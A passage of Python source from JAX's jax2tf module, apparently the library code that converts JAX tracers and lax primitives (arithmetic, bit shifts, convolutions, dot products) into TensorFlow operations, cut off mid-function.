(val_dtype == tf.int32 and aval_dtype == jnp.int64 or
val_dtype == tf.int64 and aval_dtype == jnp.int32 or
val_dtype == tf.float32 and aval_dtype == jnp.float64 or
val_dtype == tf.float64 and aval_dtype == jnp.float32 or
val_dtype == tf.complex128 and aval_dtype == jnp.complex64)):
# If JAX does not have x64 bit mode enabled, it will force the 64-bit
# values to use 32-bit precision. In order to make the TF conversion
# follow JAX's rules, we cast the TF values down to 32-bit mode.
val = tf.cast(val, dtype=aval_dtype)
val_dtype = aval_dtype
if config.jax_enable_checks:
assert aval_dtype == val_dtype, f"expected {aval_dtype} == {val_dtype}"
for aval_dim, val_dim in util.safe_zip(
self._aval.shape, val_shape): # type: ignore[attr-defined]
if val_dim is None:
assert isinstance(
aval_dim, shape_poly.DimVar
), f"expected {self._aval.shape} == {val_shape}" # type: ignore[attr-defined]
elif not isinstance(aval_dim, shape_poly.DimVar):
assert aval_dim == val_dim, f"expected {self._aval.shape} == {val_shape}" # type: ignore[attr-defined]
else:
# We have a TF value with known shape, and the abstract shape is a shape variable.
try:
aval_int = int(_eval_shape([aval_dim])) # type: ignore
except TypeError:
continue
assert aval_int == val_dim, f"expected {self._aval.shape} == {val_shape}. Found {aval_int} != {val_dim}." # type: ignore
self.val = val
else: # Must be a numeric value
self.val = _safe_convert_to_tensor(
val, dtype=self._aval.dtype) # type: ignore[attr-defined]
@property
def aval(self):
return self._aval
def full_lower(self):
return self
class TensorFlowTrace(core.Trace):
"""Trace class that underlies the jax2tf transformation.
We are going to ensure that jax2tf.convert is never nested inside other
transformations. This is sufficient for intended use cases (converting
fully-transformed JAX code). It also simplifies our job because we do not have
to handle situations where we apply primitives on a mix of TF values and
JAX tracers from an outer transformation. E.g., for addition both the TF
values
and the JAX tracers have an override and they get confused if they see values
from the other world.
Hence a TFT trace does not interact with non-TFT traces at lower-level. For
higher-order control-flow primitives we invoke recursively
_interpret_fun on the body of the conditional, which will create a nested TFT.
We do want to allow transformations nested inside a TensorFlowTrace (TFT), but
those will introduce their own MainTrace, and any operations involving those
will be done on those traces, i.e., not a concern for TFT.
"""
def pure(self, val: Union[TfVal, core.Unit]) -> TensorFlowTracer:
"""Lifts a non-Tracer into the TensorFlowTracer.
This function may be called by way of trace.full_raise.
The value may be a core.unit. During JAX transformations we sometimes
produce a Jaxpr that has arguments of abstract value core.abstract_unit
and results equal to core.unit. These are arguments and results that are
not used in the computation.
In TF world, we represent core.unit as NaN. This is safe, as these values
should never be used.
"""
if val is core.unit:
return TensorFlowTracer(self, tf.constant(np.nan, tf.float32),
core.abstract_unit)
else:
shape, dtype = _tfval_shape_dtype(val)
return TensorFlowTracer(self, val, core.ShapedArray(shape, dtype))
def lift(self, val: core.Tracer) -> TensorFlowTracer:
# This would be called when we need to raise a tracer from a lower-level
# main into the TensorFlowTrace. Since the TensorFlowTrace is never nested
# inside another transform, there are no lower-level main traces.
assert False
def sublift(self, val: TensorFlowTracer) -> TensorFlowTracer:
# This is called when we need to raise a tracer from the same master,
# but a lower sublevel. This could come from a nested jit.
return TensorFlowTracer(self, val.val, val._aval)
def process_primitive(self, primitive: core.Primitive,
tracers: Sequence[TensorFlowTracer],
params) -> TensorFlowTracer:
impl, impl_needs_avals = self.get_primitive_impl(primitive)
args_avals: Sequence[core.AbstractValue] = tuple(t.aval for t in tracers)
out_aval = primitive.abstract_eval(*args_avals, **params)
args_tf: Sequence[TfVal] = [t.val for t in tracers]
if impl_needs_avals:
val_out: TfVal = impl(
*args_tf,
_in_avals=args_avals, # type: ignore
_out_aval=out_aval,
**params)
else:
val_out = impl(*args_tf, **params)
if primitive.multiple_results:
out = [
TensorFlowTracer(self, v, a)
for v, a in util.safe_zip(val_out, out_aval)
] # type: ignore
else:
out = TensorFlowTracer(self, val_out, out_aval) # type: ignore
# Check that the impl rule returned a value of expected shape and dtype
# TODO: adapt this to match polymorphic shapes
if config.jax_enable_checks:
if primitive.multiple_results:
for o, expected_aval in zip(out, out_aval): # type: ignore
assert o.aval.strip_weak_type() == expected_aval.strip_weak_type(), (
f"{primitive}: out.aval = {o.aval}; expected {expected_aval}")
else:
assert out.aval == out_aval, ( # type: ignore
f"{primitive}: out.aval = {out.aval}; expected {out_aval}"
) # type: ignore
return out # type: ignore
def process_call(self, call_primitive: core.Primitive, f: lu.WrappedFun,
tracers: Sequence[TensorFlowTracer], params):
assert call_primitive.multiple_results
vals: Sequence[TfVal] = [t.val for t in tracers]
f = _interpret_subtrace(f, self.main, tuple(t.aval for t in tracers))
with core.new_sublevel():
if call_primitive == core.named_call_p:
with tf.name_scope(_sanitize_scope_name(params["name"])):
vals_out: Sequence[Tuple[TfVal, core.AbstractValue]] = \
f.call_wrapped(*vals)
elif call_primitive == sharded_jit.sharded_call_p:
vals_out = _sharded_call(f, vals, **params)
else:
vals_out = f.call_wrapped(*vals)
return [TensorFlowTracer(self, v, a) for v, a in vals_out]
def post_process_call(self, call_primitive: core.Primitive,
out_tracers: Sequence[TensorFlowTracer], params):
# We encountered a call primitive, e.g., remat_call_p, whose result
# (out_tracers) include TensorFlowTracer that were not passed through
# its arguments (captured from the environment).
vals = tuple(t.val for t in out_tracers)
main = self.main
def todo(vals: Sequence[TfVal]):
trace = TensorFlowTrace(main, core.cur_sublevel())
return [
TensorFlowTracer(trace, v, out_tracer.aval)
for v, out_tracer in util.safe_zip(vals, out_tracers)
]
return vals, todo
def process_map(self, map_primitive, f, tracers, params):
raise NotImplementedError("process_map")
def post_process_map(self, map_primitive, out_tracers, params):
raise NotImplementedError("post_process_map")
def process_custom_jvp_call(self, prim, fun, jvp, tracers):
# Drop the custom differentiation rule and act like a call primitive. This
# behavior is desirable because jax2tf stages code out of the JAX system, so
# there are no more JAX differentiation transformations to be applied.
del jvp # Unused.
return self.process_call(core.call_p, fun, tracers, {})
def post_process_custom_jvp_call(self, out_tracers, params):
assert False # unreachable assuming jax2tf runs with clean trace state
def process_custom_vjp_call(self, prim, fun, fwd, bwd, tracers, out_trees):
# Drop the custom differentiation rule and act like a call primitive. This
# behavior is desirable because jax2tf stages code out of the JAX system, so
# there are no more JAX differentiation transformations to be applied.
del fwd, bwd, out_trees # Unused.
return self.process_call(core.call_p, fun, tracers, {})
def post_process_custom_vjp_call(self, out_tracers, params):
assert False # unreachable assuming jax2tf runs with clean trace state
def get_primitive_impl(self, p: core.Primitive) -> Tuple[Callable, bool]:
# Returns the primitive implementation and whether the implementation
# takes abstract values (see definition of tf_impl_with_avals)
try:
return tf_impl[p], False
except KeyError:
try:
return tf_impl_with_avals[p], True
except KeyError as err:
msg = "TensorFlow interpretation rule for '{}' not implemented"
raise NotImplementedError(msg.format(p)) from err
def to_tf_dtype(jax_dtype):
if jax_dtype == dtypes.float0:
jax_dtype = dtypes.bfloat16
return tf.dtypes.as_dtype(jax_dtype)
def to_jax_dtype(tf_dtype):
return tf_dtype.as_numpy_dtype
def _unexpected_primitive(p: core.Primitive, *args, **kwargs):
assert False, f"Encountered unexpected primitive {p}"
for unexpected in xla.call_translations: # Call primitives are inlined
tf_impl[unexpected] = functools.partial(_unexpected_primitive, unexpected)
# Primitives that are not yet implemented must be explicitly declared here.
tf_not_yet_impl = [
"reduce",
"rng_uniform",
"clz",
"igamma_grad_a",
"random_gamma_grad",
"reduce_precision",
# Not high priority?
"after_all",
"all_to_all",
"create_token",
"infeed",
"outfeed",
"pmax_p",
"pmin",
"ppermute",
"psum",
"pmax",
"pgather",
"axis_index",
"pdot",
"all_gather",
"lu_pivots_to_permutation",
"rng_bit_generator",
"xla_pmap",
"call_tf",
]
tf_impl[ad_util.stop_gradient_p] = tf.stop_gradient
tf_impl[ad_util.zeros_like_p] = tf.zeros_like
def _add(x: TfVal, y: TfVal) -> TfVal:
return tf.raw_ops.AddV2(x=x, y=y)
tf_impl[ad_util.add_jaxvals_p] = _add
tf_impl[xla.device_put_p] = lambda x, device=None: x
tf_impl[lax.neg_p] = tf.math.negative
def _sign(x: TfVal) -> TfVal:
if x.dtype.is_unsigned:
# TF and XLA do not support tf.math.sign for unsigned types.
return tf.where(
tf.math.equal(x, 0), np.array(0, dtype=x.dtype),
np.array(1, dtype=x.dtype))
else:
return tf.math.sign(x)
tf_impl[lax.sign_p] = _sign
tf_impl[lax.floor_p] = tf.math.floor
tf_impl[lax.ceil_p] = tf.math.ceil
def _round(operand, *, rounding_method):
if rounding_method is lax.RoundingMethod.AWAY_FROM_ZERO:
sign = _sign(operand)
operand *= sign
floor = tf.math.floor(operand)
operand -= floor
cond = tf.math.equal(operand, tf.constant(np.array(0.5), operand.dtype))
return sign * (
tf.where(cond, tf.constant(np.array(1), operand.dtype),
tf.math.round(operand)) + floor)
else:
return tf.math.round(operand)
tf_impl[lax.round_p] = _round
tf_impl[lax.nextafter_p] = tf.math.nextafter
def _population_count(x):
orig_dtype = x.dtype
return tf.cast(tf.raw_ops.PopulationCount(x=x), orig_dtype)
tf_impl[lax.population_count_p] = _population_count
tf_impl[lax.is_finite_p] = tf.math.is_finite
def _abs(x: TfVal) -> TfVal:
# TF and XLA do not support tf.math.abs for unsigned types.
return tf.math.abs(x) if not x.dtype.is_unsigned else x
tf_impl[lax.abs_p] = _abs
tf_impl[lax.pow_p] = tf.math.pow
def _integer_pow(x, *, y: int, _in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
# Follows the implementation in lax._integer_pow_translation_rule
if y == 0:
return tf.broadcast_to(
tf.constant(1, dtype=x.dtype, shape=()), _eval_shape(_out_aval.shape))
is_reciprocal = y < 0
if is_reciprocal:
y = -y
acc = None
while y > 0:
if y & 1:
acc = x if acc is None else tf.math.multiply(acc, x)
y >>= 1
if y > 0:
x = tf.math.multiply(x, x)
return tf.math.reciprocal(acc) if is_reciprocal else acc
tf_impl_with_avals[lax.integer_pow_p] = _integer_pow
tf_impl[lax.exp_p] = tf.math.exp
tf_impl[lax.expm1_p] = tf.math.expm1
tf_impl[lax.log_p] = tf.math.log
tf_impl[lax.log1p_p] = tf.math.log1p
tf_impl[lax.tan_p] = tf.math.tan
tf_impl[lax.tanh_p] = tf.math.tanh
tf_impl[lax.sin_p] = tf.math.sin
tf_impl[lax.sinh_p] = tf.math.sinh
tf_impl[lax.cos_p] = tf.math.cos
tf_impl[lax.cosh_p] = tf.math.cosh
tf_impl[lax.acos_p] = tf.math.acos
tf_impl[lax.asin_p] = tf.math.asin
tf_impl[lax.atan_p] = tf.math.atan
tf_impl[lax.atan2_p] = tf.math.atan2
tf_impl[lax.acosh_p] = tf.math.acosh
tf_impl[lax.atanh_p] = tf.math.atanh
tf_impl[lax.asinh_p] = tf.math.asinh
tf_impl[lax.sqrt_p] = tf.math.sqrt
tf_impl[lax.rsqrt_p] = tf.math.rsqrt
tf_impl[lax.lgamma_p] = tf.math.lgamma
tf_impl[lax.digamma_p] = tf.math.digamma
tf_impl[lax.igamma_p] = tf.math.igamma
tf_impl[lax.igammac_p] = tf.math.igammac
tf_impl[lax.regularized_incomplete_beta_p] = tf.math.betainc
tf_impl[lax.erf_p] = tf.math.erf
tf_impl[lax.erfc_p] = tf.math.erfc
tf_impl[lax.erf_inv_p] = tf.math.erfinv
tf_impl[lax.bessel_i0e_p] = tf.math.bessel_i0e
tf_impl[lax.bessel_i1e_p] = tf.math.bessel_i1e
tf_impl[lax.complex_p] = tf.complex
def _conj(x, **kwargs):
# The only dtypes that are allowed are: float32, float64, complex64, and
# complex128.
if x.dtype == tf.float32:
return tf.cast(x, tf.complex64)
elif x.dtype == tf.float64:
return tf.cast(x, tf.complex128)
else:
return tf.math.conj(x)
tf_impl[lax.conj_p] = _conj
tf_impl[lax.real_p] = tf.math.real
tf_impl[lax.imag_p] = tf.math.imag
tf_impl[lax.add_p] = _add
tf_impl[lax.sub_p] = tf.math.subtract
tf_impl[lax.mul_p] = tf.math.multiply
def _iota(*, dtype, shape, dimension):
dtype = to_tf_dtype(dtype)
# Some dtypes are unsupported, like uint32, so we just fall back to int32.
# TODO(mattjj, necula): improve tf.range dtype handling
shape_tf = _eval_shape(shape)
vec = tf.range(tf.cast(shape_tf[dimension], tf.int32), dtype=tf.int32)
vec_shape = [-1 if i == dimension else 1 for i in range(len(shape))]
return tf.cast(tf.broadcast_to(tf.reshape(vec, vec_shape), shape_tf), dtype)
tf_impl[lax.iota_p] = _iota
def _div(lhs, rhs):
if lhs.dtype.is_integer:
quotient = tf.math.floordiv(lhs, rhs)
select = tf.math.logical_and(
tf.not_equal(_sign(lhs), _sign(rhs)),
tf.not_equal(tf.math.floormod(lhs, rhs), 0))
return tf.where(select, quotient + 1, quotient)
else:
return tf.math.truediv(lhs, rhs)
def _rem(lhs, rhs):
return _sign(lhs) * tf.math.floormod(_abs(lhs), _abs(rhs))
tf_impl[lax.div_p] = _div
tf_impl[lax.rem_p] = _rem
tf_impl[lax.max_p] = tf.math.maximum
tf_impl[lax.min_p] = tf.math.minimum
# Map from TF signed types to TF unsigned types.
_SIGNED_TO_UNSIGNED_TABLE = {
tf.int8: tf.uint8,
tf.int16: tf.uint16,
tf.int32: tf.uint32,
tf.int64: tf.uint64,
}
# Map from TF unsigned types to TF signed types.
_UNSIGNED_TO_SIGNED_TABLE = {u: s for s, u in _SIGNED_TO_UNSIGNED_TABLE.items()}
# Note: Bitwise operations only yield identical results on unsigned integers!
# pylint: disable=protected-access
def _shift_right_arithmetic_raw(x, y):
if x.dtype.is_unsigned:
assert x.dtype == y.dtype
orig_dtype = x.dtype
signed_dtype = _UNSIGNED_TO_SIGNED_TABLE[orig_dtype]
x = tf.cast(x, signed_dtype)
y = tf.cast(y, signed_dtype)
res = tf.bitwise.right_shift(x, y)
return tf.cast(res, orig_dtype)
else:
return tf.bitwise.right_shift(x, y)
def _shift_right_arithmetic(x, y):
# TF shift is "implementation defined" if the shift amount is negative
# or larger or equal to the size of the value. We implement the XLA
# semantics to return the shift by the max value (x_bits - 1).
# TODO: it is likely better to add XlaOps for shifts
x_bits = 8 * x.dtype.size
clamp_y = tf.where(_shift_in_bounds(x, y), y, x_bits - 1)
return _shift_right_arithmetic_raw(x, clamp_y)
tf_impl[lax.shift_right_arithmetic_p] = _shift_right_arithmetic
def _shift_right_logical_raw(x, y):
if x.dtype.is_unsigned:
return tf.bitwise.right_shift(x, y)
else:
assert x.dtype == y.dtype
orig_dtype = x.dtype
unsigned_dtype = _SIGNED_TO_UNSIGNED_TABLE[orig_dtype]
x = tf.cast(x, unsigned_dtype)
y = tf.cast(y, unsigned_dtype)
res = tf.bitwise.right_shift(x, y)
return tf.cast(res, orig_dtype)
def _shift_right_logical(x, y):
# TF shift is "implementation defined" if the shift amount is negative
# or larger or equal to the size of the value. We implement the XLA semantics
# to return 0.
# TODO: it is likely better to add XlaOps for shifts
return tf.where(
_shift_in_bounds(x, y), _shift_right_logical_raw(x, y), tf.zeros_like(x))
tf_impl[lax.shift_right_logical_p] = _shift_right_logical
def _shift_left(x, y):
# TF shift is "implementation defined" if the shift amount is negative
# or larger or equal to the size of the value. We implement the XLA semantics
# to return 0.
# TODO: it is likely better to add XlaOps for shifts
return tf.where(
_shift_in_bounds(x, y), tf.bitwise.left_shift(x, y), tf.zeros_like(x))
tf_impl[lax.shift_left_p] = _shift_left
def _shift_in_bounds(x: TfVal, y: TfVal) -> TfVal:
# Return the TF expression for when y is within bounds (0 <= y < |x|)
x_bits = 8 * x.dtype.size
# TF does not have comparisons for uint16 and uint32 (despite what the
# documentation says)
y_comp = tf.cast(
y, _UNSIGNED_TO_SIGNED_TABLE[y.dtype]) if y.dtype.is_unsigned else y
y_lt_x_bits = tf.math.less(y_comp, x_bits)
y_ge_0 = tf.math.greater_equal(y_comp, 0)
return tf.logical_and(y_lt_x_bits, y_ge_0)
def _not(x):
"""Computes bitwise not with support for booleans.
Numpy and JAX support bitwise not for booleans by applying a logical not!
This means that applying bitwise_not yields an unexected result:
jnp.bitwise_not(jnp.array([True, False]))
>> DeviceArray([False, True], dtype=bool)
if you assume that booleans are simply casted to integers.
jnp.bitwise_not(jnp.array([True, False]).astype(np.int32)).astype(bool)
>> DeviceArray([True, True], dtype=bool)
"""
if x.dtype == tf.bool:
return tf.logical_not(x)
else:
return tf.bitwise.invert(x)
tf_impl[lax.not_p] = _not
def bool_to_int8(f, argnums):
"""Computes bool valued functions using int8."""
argnums = tf.nest.flatten(argnums)
def wrapper(*args, **kwargs):
if not any(args[i].dtype == tf.bool for i in argnums):
return f(*args, **kwargs)
else:
args_cast = [(tf.cast(a, tf.int8) if i in argnums else a)
for i, a in enumerate(args)]
if "_in_avals" in kwargs:
def cast_aval(aval):
return core.ShapedArray(aval.shape, np.int8)
_in_avals_cast = [
cast_aval(aval) if i in argnums else aval
for i, aval in enumerate(kwargs["_in_avals"])
]
_out_aval_cast = tf.nest.map_structure(cast_aval, kwargs["_out_aval"])
kwargs = dict(
kwargs, _in_avals=_in_avals_cast, _out_aval=_out_aval_cast)
out = f(*args_cast, **kwargs)
return tf.nest.map_structure(lambda o: tf.cast(o, tf.bool), out)
return wrapper
tf_impl[lax.or_p] = bool_to_int8(tf.bitwise.bitwise_or, argnums=(0, 1))
tf_impl[lax.and_p] = bool_to_int8(tf.bitwise.bitwise_and, argnums=(0, 1))
tf_impl[lax.xor_p] = bool_to_int8(tf.bitwise.bitwise_xor, argnums=(0, 1))
tf_impl[lax.eq_p] = tf.math.equal
tf_impl[lax.ne_p] = tf.math.not_equal
tf_impl[lax.ge_p] = tf.math.greater_equal
tf_impl[lax.gt_p] = tf.math.greater
tf_impl[lax.le_p] = tf.math.less_equal
tf_impl[lax.lt_p] = tf.math.less
tf_impl[lax_linalg.cholesky_p] = tf.linalg.cholesky
def _convert_element_type(operand, *, new_dtype, weak_type=False):
old_dtype = operand.dtype.as_numpy_dtype
if (dtypes.issubdtype(old_dtype, np.complexfloating) and
not dtypes.issubdtype(new_dtype, np.complexfloating)):
operand = tf.math.real(operand)
if (dtypes.issubdtype(old_dtype, np.floating) and
not (dtypes.issubdtype(new_dtype, np.floating) or dtypes.issubdtype(
new_dtype, np.complexfloating) or new_dtype == np.bool_)):
sign = _sign(operand)
operand = sign * tf.math.floor(sign * operand)
return tf.dtypes.cast(operand, to_tf_dtype(new_dtype))
tf_impl[lax.convert_element_type_p] = _convert_element_type
def _bitcast_convert_type(operand, new_dtype):
return tf.bitcast(operand, to_tf_dtype(new_dtype))
tf_impl[lax.bitcast_convert_type_p] = _bitcast_convert_type
def _clamp(minval, operand, maxval, *, _in_avals, _out_aval):
# The below permits mirroring the behavior of JAX when maxval < minval
op_shape_tf_val = _eval_shape(_in_avals[1].shape)
maxval = tf.broadcast_to(maxval, op_shape_tf_val)
minval = tf.math.minimum(tf.broadcast_to(minval, op_shape_tf_val), maxval)
return tf.clip_by_value(operand, minval, maxval)
tf_impl_with_avals[lax.clamp_p] = _clamp
def _concatenate(*operands, dimension):
return tf.concat(operands, axis=dimension)
tf_impl[lax.concatenate_p] = _concatenate
def _conv_general_dimension_numbers_proto(dimension_numbers):
"""Converts a ConvDimensionNumbers to an XLA ConvolutionDimensionNumbers."""
assert isinstance(dimension_numbers, lax.ConvDimensionNumbers)
lhs_spec, rhs_spec, out_spec = dimension_numbers
proto = xla_data_pb2.ConvolutionDimensionNumbers()
proto.input_batch_dimension = lhs_spec[0]
proto.input_feature_dimension = lhs_spec[1]
proto.output_batch_dimension = out_spec[0]
proto.output_feature_dimension = out_spec[1]
proto.kernel_output_feature_dimension = rhs_spec[0]
proto.kernel_input_feature_dimension = rhs_spec[1]
proto.input_spatial_dimensions.extend(lhs_spec[2:])
proto.kernel_spatial_dimensions.extend(rhs_spec[2:])
proto.output_spatial_dimensions.extend(out_spec[2:])
return proto
def _precision_config_proto(precision: Optional[Tuple[PrecisionType,
PrecisionType]]):
"""Convert an integer to an XLA.PrecisionConfig."""
if precision is None:
return None
proto = xla_data_pb2.PrecisionConfig()
proto.operand_precision.append(int(precision[0]))
proto.operand_precision.append(int(precision[1]))
return proto
def _try_tf_conv(lhs, rhs, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count, batch_group_count,
preferred_element_type: Optional[DType],
out_shape) -> TfVal:
def error(msg):
suffix = ("See source code for the precise conditions under which "
"convolutions can be converted without XLA.")
return _xla_disabled_error("conv_general_dilated", f"{msg} - {suffix}")
# TODO(bchetioui): this function is not exhaustive wrt which convolution cases
# can be translated into TF primitives. Further investigation is needed to
# fully flesh it out.
if lhs.dtype not in [tf.float16, tf.float32, tf.float64]:
raise error(f"tf.nn.convolution is not supported for dtype {lhs.dtype}")
if feature_group_count != 1:
raise error("tf.nn.convolution does not support grouped convolutions")
# TODO(bchetioui): is there something to do with batch_group_count?
if batch_group_count != 1:
raise error("Unimplemented support for batch_group_count != 1")
nb_spatial_dimensions = len(lhs.shape) - 2
# TF can only deal with 1D, 2D and 3D convolution
if nb_spatial_dimensions < 1 or nb_spatial_dimensions > 3:
raise error("TensorFlow can only handle convolutions with 1, 2, or 3 "
"spatial dimensions")
# TODO(bchetioui): handle different stride cases
if list(window_strides) != [1] * nb_spatial_dimensions:
raise error("Unimplemented support for window_strides != "
f"{tuple([1] * nb_spatial_dimensions)}")
if preferred_element_type is not None and preferred_element_type != lhs.dtype:
raise error("Unimplemented support for preferred_element_type")
def convert_padding() -> str:
# TODO(bchetioui): in this instance, we can not use padtype_to_pads as
# string padding is not implemented for transposed convolution.
if list(lhs_dilation) != [1] * nb_spatial_dimensions:
raise error("Padding conversion is not supported for transposed "
"convolution.")
lhs_perm, rhs_perm, _ = dimension_numbers
effective_rhs_shape = [
(k - 1) * r + 1
for k, r in zip(np.take(rhs.shape, rhs_perm)[2:], rhs_dilation)
]
lhs_shape = np.take(lhs.shape, lhs_perm)[2:]
# TF only allows 'VALID' and 'SAME' padding
for pad_str in ["VALID", "SAME"]:
gen_padding = lax.padtype_to_pads(
lhs_shape, effective_rhs_shape, window_strides, pad_str)
if list(gen_padding) == list(padding):
return pad_str
raise error("Input padding not supported in TensorFlow.")
def convert_dim_nums() -> str:
lhs_spec, rhs_spec, out_spec = dimension_numbers
# TF only allows filters with shape:
# spatial_filter_shape + [in_channels, out_channels]. In JAX however,
# rhs_spec is represented as a tuple containing the following:
# [out_channels, in_channels] + spatial_filter_shape.
supported_rhs_shape = ([nb_spatial_dimensions + 1, nb_spatial_dimensions] +
list(range(nb_spatial_dimensions)))
if list(rhs_spec) != supported_rhs_shape:
raise error("Input filter (RHS) shape format not supported in "
"TensorFlow.")
# TF only supports same LHS and output data format
if lhs_spec != out_spec:
raise error("TensorFlow requires the same data format for LHS and "
"output.")
# Alphabet extracted from the documentation of tf.conv{1,2,3}d
spatial_dim_alphabet = "DHW"[-nb_spatial_dimensions:]
# TF only supports the following data formats:
# - [batch_size, in_channels] + input_spatial_shape
# TODO(bchetioui): TF currently does not support the above on CPU. To avoid
# failing on this platform, this path is commented out for now.
# if list(lhs_spec) == list(range(len(lhs_spec))):
# return "NC" + spatial_dim_alphabet
# - [batch_size] + input_spatial_shape + [in_channels]
if list(lhs_spec) == ([0, len(lhs_spec) - 1] +
list(range(1,
len(lhs_spec) - 1))):
return "N" + spatial_dim_alphabet + "C"
raise error("Data format is unsupported by TensorFlow.")
def convert_dilation_and_compute_result(tf_padding: str,
tf_dim_nums: str) -> TfVal:
no_dilation = [1] * nb_spatial_dimensions
# TODO(bchetioui): is there a generic way to do a transposed atrous
# convolution in TensorFlow?
if not (list(lhs_dilation) == no_dilation or
list(rhs_dilation) == no_dilation):
raise error("Both LHS and RHS dilations are set.")
# This is a non-dilated or atrous convolution
if list(lhs_dilation) == no_dilation:
return tf.nn.convolution(
lhs,
rhs,
strides=window_strides,
padding=tf_padding,
data_format=tf_dim_nums,
dilations=rhs_dilation)
# TODO(bchetioui): the below path is unreachable for now, as passing a lhs
# dilation to this function will result in convert_padding returning None
# systematically. This must be investigated further.
# Dilation of the LHS is transposed convolution
return tf.nn.conv_transpose(
lhs,
rhs,
out_shape,
window_strides,
padding=tf_padding,
data_format=tf_dim_nums,
dilations=lhs_dilation)
tf_padding = convert_padding()
tf_dim_nums = convert_dim_nums()
return convert_dilation_and_compute_result(tf_padding, tf_dim_nums)
def _conv_general_dilated(lhs, rhs, *,
window_strides, padding, lhs_dilation,
rhs_dilation,
dimension_numbers: lax.ConvDimensionNumbers,
feature_group_count: int,
batch_group_count: int,
lhs_shape: Sequence[int],
rhs_shape: Sequence[int],
precision: Optional[Tuple[PrecisionType, PrecisionType]],
preferred_element_type: Optional[DType],
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
"""Implementation of lax.conv_general_dilated_p using XlaConv."""
out_tf_shape = _aval_to_tf_shape(_out_aval)
if not _enable_xla:
return _try_tf_conv(
lhs, rhs, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count, batch_group_count,
preferred_element_type, out_tf_shape)
dnums_proto = _conv_general_dimension_numbers_proto(dimension_numbers)
precision_config_proto = _precision_config_proto(precision)
assert batch_group_count == 1 # TODO(necula): implement batch_group_count
def gen_conv(lhs, rhs, preferred_element_type: Optional[DType]):
out = tfxla.conv(
lhs,
rhs,
window_strides,
padding,
lhs_dilation,
rhs_dilation,
dnums_proto,
feature_group_count=feature_group_count,
precision_config=precision_config_proto,
preferred_element_type=preferred_element_type)
# TODO: implement shape inference for XlaConv
out.set_shape(out_tf_shape)
return out
# Follow the lowering for complex convolutions from
# lax._conv_general_dilated_translation. We can use the same conversion on all
# platforms because on XLA:TPU the compiler does the same as a rewrite.
if np.issubdtype(_in_avals[0].dtype, np.complexfloating):
if preferred_element_type is not None:
# Convert complex dtype to types used for real and imaginary parts
assert np.issubdtype(preferred_element_type, np.complexfloating)
preferred_float_et = (
np.float64 if preferred_element_type == np.complex128 else np.float32)
else:
preferred_float_et = None
lhs_real, lhs_imag = tf.math.real(lhs), tf.math.imag(lhs)
rhs_real, rhs_imag = tf.math.real(rhs), tf.math.imag(rhs)
k1 = gen_conv(_add(lhs_real, lhs_imag), rhs_real, preferred_float_et)
k2 = gen_conv(lhs_real, tf.math.subtract(rhs_imag, rhs_real),
preferred_float_et)
k3 = gen_conv(lhs_imag, _add(rhs_real, rhs_imag), preferred_float_et)
return tf.complex(tf.math.subtract(k1, k3), _add(k1, k2))
else:
return gen_conv(lhs, rhs, preferred_element_type)
tf_impl_with_avals[lax.conv_general_dilated_p] = _conv_general_dilated
def _dot_general(lhs, rhs, *, dimension_numbers,
precision: Optional[Tuple[PrecisionType, PrecisionType]],
preferred_element_type: Optional[DType],
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
"""Implementation of lax.dot_general_p in terms of tf.linalg.einsum."""
(lhs_contracting, rhs_contracting), (lhs_batch, rhs_batch) = dimension_numbers
lhs_ndim, rhs_ndim = len(lhs.shape), len(rhs.shape)
if _enable_xla:
dnums_proto = xla_data_pb2.DotDimensionNumbers()
dnums_proto.lhs_contracting_dimensions.extend(lhs_contracting)
dnums_proto.rhs_contracting_dimensions.extend(rhs_contracting)
dnums_proto.lhs_batch_dimensions.extend(lhs_batch)
dnums_proto.rhs_batch_dimensions.extend(rhs_batch)
precision_config_proto = _precision_config_proto(precision)
res = tfxla.dot_general(
lhs,
rhs,
dnums_proto,
precision_config_proto,
preferred_element_type=preferred_element_type)
# TODO: in presence of None dimensions, XlaDot shape inference returns
# unknown shape.
res.set_shape(_aval_to_tf_shape(_out_aval))
return res
# This condition ensures that:
# 1) the batch dimensions are ordered in the same way in lhs and rhs (this is
# not strictly necessary, but we would have to reshape the array if that
# were not the case;
# 2) lhs and rhs have the same number of dimensions +/- 1
# 3) the number of non-batch dimensions in both tensors is either 1 or 2
# 4) the contracting dimensions are consistent with those of a classic
# matrix/matrix, vector/matrix or matrix/vector multiplication.
if (lhs_batch == rhs_batch == tuple(range(len(lhs_batch))) and
lhs_ndim - rhs_ndim in [-1, 0, 1] and
1 <= lhs_ndim - len(lhs_batch) <= 2 and
1 <= rhs_ndim - len(rhs_batch) <= 2 and
lhs_contracting == (len(lhs.shape) - 1,) and
rhs_contracting == (len(lhs_batch),)):
# All the inputs to tf.linalg.matmul must have 2 inner dimensions,
# after their batch dimensions, so we need to expand the dimensions
# appropriately. We can get to this branch with three combinations of
# inner shapes:
# - lhs.inner_shape == [a, b], rhs.inner_shape == [b, c]
# - in this case, the resulting inner shape is [a, c];
# - lhs.inner_shape == [b] , rhs.inner_shape == [b, c]
# - in this case, we need to expand lhs to [1, b], and the resulting
# shape is [c]. We need to squeeze the result of tf.linalg.matmul
# as it will have shape [1, c];
# - lhs.shape == [batch] + [a, b], rhs.shape == [batch] + [b]
# - in this case, we need to expand rhs to [b, 1], and the resulting
# shape is [a]. We need to squeeze the result of tf.linalg.matmul
# as it will have shape [a, 1];
# - lhs.shape == [batch] + [b] , rhs.shape == [batch] + [b]
# - in this case, we need to expand lhs to [1, b] and rhs to [b, 1],
# and the resulting shape is (). We need to squeeze the result of
# tf.linalg.matmul as it will have shape [1, 1].
squeeze_idxs = []
if lhs_ndim - len(lhs_batch) == 1:
lhs = tf.expand_dims(lhs, lhs_ndim - 1)
squeeze_idxs.append(len(lhs.shape) - 2)
if rhs_ndim - len(rhs_batch) == 1:
rhs = tf.expand_dims(rhs, rhs_ndim)
squeeze_idxs.append(len(rhs.shape) - 1)
result = tf.linalg.matmul(lhs, rhs)
if len(squeeze_idxs) != 0:
assert all([result.shape[i] == 1 for i in squeeze_idxs])
result = tf.squeeze(result, squeeze_idxs)
return result
new_id = iter(string.ascii_letters)
lhs_axis_ids = [next(new_id) for _ in lhs.shape]
rhs_axis_ids = [next(new_id) for _ in rhs.shape]
lhs_out_axis_ids = lhs_axis_ids[:]
rhs_out_axis_ids = rhs_axis_ids[:]
